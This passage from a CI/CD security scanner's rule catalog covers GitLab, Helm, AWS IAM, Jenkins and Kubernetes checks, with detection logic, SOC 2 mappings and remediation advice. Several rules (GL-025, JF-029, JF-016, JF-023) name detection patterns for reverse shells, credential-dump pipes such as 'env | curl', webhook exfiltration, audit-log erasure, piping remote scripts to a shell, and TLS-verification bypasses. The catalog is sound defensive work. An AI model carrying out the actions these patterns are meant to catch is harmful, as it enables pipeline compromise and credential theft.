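    # Attach a structured provenance claim to the image, not just a signature.
    - >
      cosign attest --predicate provenance.intoto.jsonl --type slsaprovenance
      "$CI_REGISTRY_IMAGE@$IMAGE_DIGEST"
```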
Source: GL-024 in the GitLab CI provider.
GL-025: Pipeline contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fires on concrete indicators (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, env | curl credential dumps, history -c audit erasure). Orthogonal to GL-016 (remote script piped to shell) and GL-017 (Docker insecure flags). Those flag risky defaults; this flags evidence.
Recommendation. Treat as a potential compromise. Identify the MR that added the matching job(s), rotate any credentials the pipeline can reach, and audit recent runs for outbound traffic to the matched hosts. A legitimate red-team exercise should be time-bounded via .pipelinecheckignore with expires:.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: GL-025 in the GitLab CI provider.
GL-026: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. eval, sh -c "$X", and `$X` all re-parse the variable's value as shell syntax. Once a CI variable feeds into one of these idioms, any ;, &&, |, backtick, or $() in the value executes. Even if the variable's source is currently trusted, future refactors may expose it.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec of variables with direct command invocation. If the command must be dynamic, pass arguments as array members or validate the input against an allow-list at the boundary.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.
Source: GL-026 in the GitLab CI provider.
GL-029: Manual deploy job defaults to allow_failure: true MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. This is the most common GitLab deployment gotcha: a manual deploy job looks like a gate in the UI, but the pipeline reports success on the first run because the job is marked allow_failure by default. Downstream jobs (and the overall pipeline status) proceed as though the human approved.
Recommendation. Add allow_failure: false to every deploy-like when: manual job. GitLab defaults allow_failure to true for manual jobs, which makes the pipeline report success whether or not the operator clicks: exactly the opposite of the gate you meant to add.
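The fixed shape, as a sketch (job name, stage, and script are illustrative):

```yaml
deploy-prod:
  stage: deploy
  when: manual
  allow_failure: false   # without this, GitLab treats the unclicked job as passing
  environment: production
  script:
    - ./deploy.sh
```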
Source: GL-029 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
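A migrated Chart.yaml might look like this sketch (chart name, dependency, and URLs are placeholders):

```yaml
apiVersion: v2          # Helm 3 format: dependencies live here, locked by Chart.lock
name: my-service
version: 0.1.0
dependencies:           # formerly a sibling requirements.yaml under apiVersion v1
  - name: postgresql
    version: 12.1.2     # exact pin; see HELM-004
    repository: https://charts.example.com
```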
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Three failure shapes:
- Chart.yaml declares dependencies but no Chart.lock exists at all.
- Chart.lock exists but its dependencies: list is missing entries declared in Chart.yaml (drift after an edit without re-running helm dependency update).
- Chart.lock lists every dependency but one or more entries lack a digest: field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download; without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the dependencies: key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure, CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
- https://, chart-museum / OSS chart repos. The default for public Helm charts.
- oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.
- file://, in-repo dependency. No network surface.
- @alias, a local alias for a previously registered helm repo add URL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's ~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives: a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
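The pin/range distinction described above can be sketched in Python (an illustrative approximation, not the tool's own matcher):

```python
import re

# Accepts only exact pins: optional leading "v", dotted digits, and at most
# one pre-release (-rc1) and/or build (+build.5) suffix. Anything carrying
# range operators, wildcards, or spaces fails the match and counts as a range.
EXACT_PIN = re.compile(r"^v?\d+(\.\d+)*(-[0-9A-Za-z.]+)?(\+[0-9A-Za-z.]+)?$")

def is_exact_pin(version: str) -> bool:
    return bool(EXACT_PIN.match(version.strip()))
```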
Source: HELM-004 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without Chart.lock are skipped (HELM-002 covers the missing-lock case directly), and charts whose generated: field is malformed or absent silently pass on this rule.
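The staleness comparison can be sketched in Python (illustrative, not the tool's code; assumes the generated: value parses as ISO-8601):

```python
from datetime import datetime, timedelta, timezone

def lock_is_stale(generated: str, now: datetime, max_age_days: int = 90) -> bool:
    """Return True when Chart.lock's generated: timestamp is older than the window."""
    ts = datetime.fromisoformat(generated)
    if ts.tzinfo is None:
        ts = ts.replace(tzinfo=timezone.utc)  # assumption: treat naive stamps as UTC
    return now - ts > timedelta(days=max_age_days)
```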
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with --ignore-file when this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted; production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
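A scoped statement might look like this sketch (account ID, role name, and service are placeholders):

```json
{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::111122223333:role/app-task-role",
  "Condition": {
    "StringEquals": { "iam:PassedToService": "ecs-tasks.amazonaws.com" }
  }
}
```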
Source: IAM-004 in the AWS provider.
IAM-005: CI/CD role trust policy missing sts:ExternalId HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. A trust policy that lets an external AWS account assume the role without an sts:ExternalId condition is vulnerable to the confused-deputy pattern: a third-party SaaS configured with your role ARN can also be used by another customer of that SaaS to assume your role (if they know the ARN). sts:ExternalId ties the role to a specific tenancy.
Recommendation. Add a Condition requiring sts:ExternalId for external principals.
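The trust-policy statement with the condition in place might look like this sketch (the external account ID and ExternalId value are placeholders supplied by the third party's tenancy):

```json
{
  "Effect": "Allow",
  "Principal": { "AWS": "arn:aws:iam::999988887777:root" },
  "Action": "sts:AssumeRole",
  "Condition": {
    "StringEquals": { "sts:ExternalId": "your-unique-tenant-id" }
  }
}
```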
Source: IAM-005 in the AWS provider.
IAM-006: Sensitive actions granted with wildcard Resource MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. IAM-002 catches Action: "*". IAM-006 catches the more common "scoped action, unscoped resource" pattern on sensitive services (S3/KMS/SecretsManager/SSM/IAM/STS/DynamoDB/Lambda/EC2).
Recommendation. Scope the Resource element to specific ARNs (buckets, keys, secrets, roles).
Source: IAM-006 in the AWS provider.
IAM-007: IAM user has access key older than 90 days HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Every user in the account is evaluated. CI/CD tooling that still uses IAM users (older Jenkins agents, GitHub Actions pre-OIDC, third-party schedulers) shows up here. The 90-day window matches the common compliance baseline; rotate sooner if the key is used from on-prem or an untrusted runner.
Recommendation. Rotate or delete IAM access keys older than 90 days. Long-lived static credentials are the #1 way compromised CI credentials get reused across environments; prefer short-lived STS tokens via OIDC federation or an assumed role.
Source: IAM-007 in the AWS provider.
IAM-008: OIDC-federated role trust policy missing audience or subject pin HIGH
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. IAM-005 already covers cross-account AWS principals. This rule targets the OIDC federation path specifically because the blast radius of a missed audience/subject pin is the entire identity provider's tenant base (e.g. all GitHub users, not just your org).
Recommendation. Every Allow statement that trusts a federated OIDC provider (token.actions.githubusercontent.com, GitLab, CircleCI, Terraform Cloud, etc.) must pin both the audience (...:aud = sts.amazonaws.com) and a subject prefix (...:sub matching repo:myorg/*). Without these, any workflow from any tenant can assume the role.
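For the GitHub Actions provider, the pinned trust policy might look like this sketch (account ID and org name are placeholders):

```json
{
  "Effect": "Allow",
  "Principal": {
    "Federated": "arn:aws:iam::111122223333:oidc-provider/token.actions.githubusercontent.com"
  },
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {
    "StringEquals": {
      "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
    },
    "StringLike": {
      "token.actions.githubusercontent.com:sub": "repo:myorg/*"
    }
  }
}
```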
Source: IAM-008 in the AWS provider.
JF-001: Shared library not pinned to a tag or commit HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. @main, @master, @develop, a library reference with no @ref at all, and any non-semver / non-SHA ref are floating. Whoever controls the upstream library can ship code into your build by pushing to that branch.
Recommendation. Pin every @Library('name@<ref>') to a release tag (e.g. @v1.4.2) or a 40-char commit SHA. Configure the library in Jenkins with 'Allow default version to be overridden' disabled so a pipeline can't escape the pin.
Source: JF-001 in the Jenkins provider.
JF-002: Script step interpolates attacker-controllable env var HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. $BRANCH_NAME / $GIT_BRANCH / $TAG_NAME / $CHANGE_* are populated from SCM event metadata the attacker controls. Single-quoted Groovy strings don't interpolate so they're safe; only double-quoted / triple-double-quoted bodies are flagged.
Recommendation. Switch the affected sh/bat/powershell step to a single-quoted string (Groovy doesn't interpolate single quotes), and pass values through a quoted shell variable (sh 'echo "$BRANCH"' after withEnv([...])).
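The safe and unsafe shapes side by side, as a sketch (the command is illustrative):

```groovy
// Single-quoted Groovy: $BRANCH_NAME is NOT interpolated by Groovy, so the
// shell sees a quoted variable reference instead of attacker-controlled text.
sh 'git checkout "$BRANCH_NAME"'

// Flagged shape for contrast: Groovy splices the raw value into the script
// body before the shell ever runs, so metacharacters in a branch name execute.
// sh "git checkout ${BRANCH_NAME}"
```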
Source: JF-002 in the Jenkins provider.
JF-003: Pipeline uses agent any (no executor isolation) MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. agent any is the broadest possible executor scope: any registered executor can be picked, including ones with broader IAM / file-system access than this build needs. A single compromised job's blast radius then spans every pool.
Recommendation. Replace agent any with agent { label 'build-pool' } (targeting a labeled pool) or agent { docker { image '...' } } (ephemeral container). Reserve broad-access agents for jobs that genuinely need them.
Source: JF-003 in the Jenkins provider.
JF-004: AWS auth uses long-lived access keys via withCredentials MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Fires when BOTH a credentialsId containing aws is referenced AND an AWS key variable name appears (requires both so an OIDC role binding doesn't false-positive). Also fires when withAWS(credentials: '…') is used; the safe alternative is withAWS(role: '…').
Recommendation. Switch to the AWS plugin's IAM-role / OIDC binding (e.g. withAWS(role: 'arn:aws:iam::…:role/jenkins')) so each build assumes a short-lived role. Remove the static AWS_ACCESS_KEY_ID secret from the Jenkins credentials store once the role is in place.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-004 in the Jenkins provider.
JF-005: Deploy stage missing manual input approval MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A stage named deploy / release / publish / promote should either use the declarative input { ... } directive or call input message: ... somewhere in its body. Without one, any push that triggers the pipeline ships to the target with no human review.
Recommendation. Add an input step to every deploy-like stage (e.g. input message: 'Promote to prod?', submitter: 'releasers'). Combine with a Jenkins folder-scoped permission so only release engineers see the prompt.
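In declarative syntax the gate might look like this sketch (stage name, message, and submitter group are illustrative):

```groovy
stage('Deploy') {
    // Declarative input directive: the stage blocks until an authorized
    // submitter approves; the prompt is scoped to the 'releasers' group.
    input {
        message 'Promote to prod?'
        submitter 'releasers'
    }
    steps {
        sh './deploy.sh'
    }
}
```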
Source: JF-005 in the Jenkins provider.
JF-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Scans the raw Jenkinsfile text against the cross-provider credential-pattern catalog. Secrets committed to Groovy source are visible in every fork and every build log.
Recommendation. Rotate the exposed credential. Move the value to a Jenkins credential and reference it via withCredentials([string(credentialsId: '…', variable: '…')]).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: JF-008 in the Jenkins provider.
JF-010: Long-lived AWS keys exposed via environment {} block HIGH 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Flags environment { AWS_ACCESS_KEY_ID = '...' } when the value is a literal or plain variable reference. Skips credentials('id') helpers and ${env.X} that resolve at runtime. Matches both multiline and inline environment { ... } forms.
Recommendation. Replace the literal with a credentials-store reference: AWS_ACCESS_KEY_ID = credentials('aws-prod-key'). Better: switch to the AWS plugin's role binding (withAWS(role: 'arn:…')) so the build assumes a short-lived role per run.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-010 in the Jenkins provider.
JF-011: Pipeline has no buildDiscarder retention policy LOW 🔧 fix
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without a retention policy, build logs accumulate indefinitely; a secret that once leaked into a log stays visible to anyone who can read jobs. Recognises declarative options { buildDiscarder(...) }, scripted properties([buildDiscarder(...)]), and bare logRotator(...).
Recommendation. Add options { buildDiscarder(logRotator(numToKeepStr: '30', daysToKeepStr: '90')) } (declarative) or the properties([buildDiscarder(...)]) equivalent in scripted pipelines. Tune the numbers to your retention policy.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-011 in the Jenkins provider.
JF-014: Agent label missing ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Static Jenkins agents that persist between builds leak workspace files and process state. The check looks for an ephemeral substring in agent { label '...' } blocks.
Recommendation. Register Jenkins agents with ephemeral lifecycle (e.g. Kubernetes pod templates or EC2 Fleet plugin) and include ephemeral in the label string so the pipeline declares its expectation.
Known false positives.
- The check looks for the literal substring ephemeral in the agent label. Teams that use a different convention (temp, runner-pool, org-specific ARC labels) trip the rule even when their runners are auto-scaled and ephemeral in fact. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH.
Source: JF-014 in the Jenkins provider.
JF-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a Jenkinsfile. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: JF-016 in the Jenkins provider.
JF-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a Jenkinsfile give the container full access to the build agent, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-017 in the Jenkins provider.
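The flag list above maps onto a simple matcher. A minimal sketch, assuming a line-oriented scan; the function name and regex are illustrative, not the shipped rule.

```python
import re

# Hypothetical JF-017-style matcher; the flag list mirrors the rule
# description above, the regex itself is an assumption.
INSECURE_FLAGS = re.compile(r"--privileged\b|--cap-add\b|--net[= ]host\b|-v\s+/:/")

def docker_run_findings(line: str) -> list[str]:
    """Return the insecure flags present on a docker run invocation."""
    if "docker run" not in line:
        return []
    return INSECURE_FLAGS.findall(line)
```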
JF-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck. Comments are stripped before matching.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: JF-020 in the Jenkins provider.
JF-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: JF-023 in the Jenkins provider.
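The pattern list above can be read as a lookup table. A minimal sketch using plain substring matching; the shipped rule may normalise whitespace or use regexes instead.

```python
# Hypothetical substring table mirroring the JF-023 description above.
TLS_BYPASS_PATTERNS = [
    "http.sslVerify false",
    "NODE_TLS_REJECT_UNAUTHORIZED=0",
    "strict-ssl false",
    "curl -k",
    "--no-check-certificate",
    "PYTHONHTTPSVERIFY=0",
    "GOINSECURE=",
]

def tls_bypasses(script: str) -> list[str]:
    """Return every TLS-verification bypass indicator found in the script."""
    return [p for p in TLS_BYPASS_PATTERNS if p in script]
```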
JF-024: input approval step missing submitter restriction MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. JF-005 already flags deploy stages with no input step. This rule catches the subtler case: the gate exists, but it doesn't actually restrict approvers. submitter accepts a comma-separated list of Jenkins usernames and group names; scope it to the smallest release-eligible pool.
Recommendation. Add a submitter: 'releasers,sre' (or a single role) argument to every input step in a deploy-like stage. Without it, any user with the Jenkins job Build permission can approve a production promotion; the approval gate becomes advisory.
Source: JF-024 in the Jenkins provider.
JF-025: Kubernetes agent pod template runs privileged or mounts hostPath HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. JF-017 flags inline docker run commands. This rule targets the other privileged-mode entry point: Jenkins' Kubernetes plugin lets pipelines declare agent { kubernetes { yaml '''...''' } }. A pod running with privileged: true or mounting hostPath: / gives the build container the same blast radius: container escape, node-credential theft, cross-tenant contamination on a shared cluster.
Recommendation. Remove privileged: true from the embedded pod YAML, drop hostPath/hostNetwork/hostPID/hostIPC entries, and add a securityContext with runAsNonRoot: true and a readOnlyRootFilesystem. If Docker-in-Docker is genuinely required, use a rootless daemon (e.g. sysbox) or run the build on a dedicated privileged pool with stricter branch protection.
Source: JF-025 in the Jenkins provider.
JF-026: build job: trigger ignores downstream failure MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The Jenkins Pipeline plugin defaults wait to true and propagate to true, but either can be flipped per call. wait: false returns immediately; propagate: false continues even when the downstream job fails or is aborted. Both patterns sever the flow-control link between the upstream approval gate and the work the downstream job is about to do.
Recommendation. Remove wait: false and propagate: false from every build job: step, or replace them with an explicit currentBuild.result = build(...).result check. A fire-and-forget trigger can silently ship broken artifacts because the upstream job reports success regardless of what the downstream job actually did.
Source: JF-026 in the Jenkins provider.
JF-028: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. cosign sign signs the artifact bytes. cosign attest signs an in-toto statement describing how the build ran: builder, source commit, input parameters. SLSA L3 verifiers check the latter so consumers can enforce policy on where and how artifacts were produced.
Recommendation. Add a sh 'cosign attest --predicate=provenance.intoto.jsonl …' step after the build, or integrate the TestifySec witness run attestor. JF-006 covers signing; this rule covers the build-provenance statement SLSA Build L3 requires.
Source: JF-028 in the Jenkins provider.
JF-029: Jenkinsfile contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Distinct from JF-016 (curl pipe) and JF-019 (Groovy sandbox escape). Those flag risky defaults; this flags concrete evidence: reverse shells, base64-decoded execution, miner binaries, exfil channels, credential-dump pipes, shell-history erasure. Runs on the comment-stripped Groovy text so a legitimate annotation like // cosign verify … or // webhook.site doesn't false-positive.
Recommendation. Treat as a potential compromise. Identify the commit that introduced the matching stage(s), rotate Jenkins credentials the job can reach, review controller/agent audit logs for outbound traffic to the matched hosts, and re-image the agent pool if the compromise may have persisted.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: JF-029 in the Jenkins provider.
JF-030: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements JF-002 (script injection from untrusted build parameters). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value feeding a dynamic command at the boundary, or pass arguments as a list to a real sh step so the shell is not re-invoked.
Known false positives.
- sh 'eval "$(ssh-agent -s)"' and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.
Source: JF-030 in the Jenkins provider.
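The idiom matching plus the literal-command exemption described above can be sketched as follows. Both patterns are assumptions for illustration, not the shipped rule.

```python
import re

# Sketch of JF-030-style eval matching with the eval-of-literal-command
# exemption: eval "$(ssh-agent -s)" runs a literal tool, so it is allowed.
EVAL_LITERAL = re.compile(r'\beval\s+"\$\(\S+')   # eval "$(<literal-tool> ...)"
EVAL_VAR = re.compile(r'\beval\s+"?\$\{?[A-Za-z_]')

def dangerous_eval(line: str) -> bool:
    if EVAL_LITERAL.search(line):
        return False  # the substituted command itself is literal
    return bool(EVAL_VAR.search(line))
```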
K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
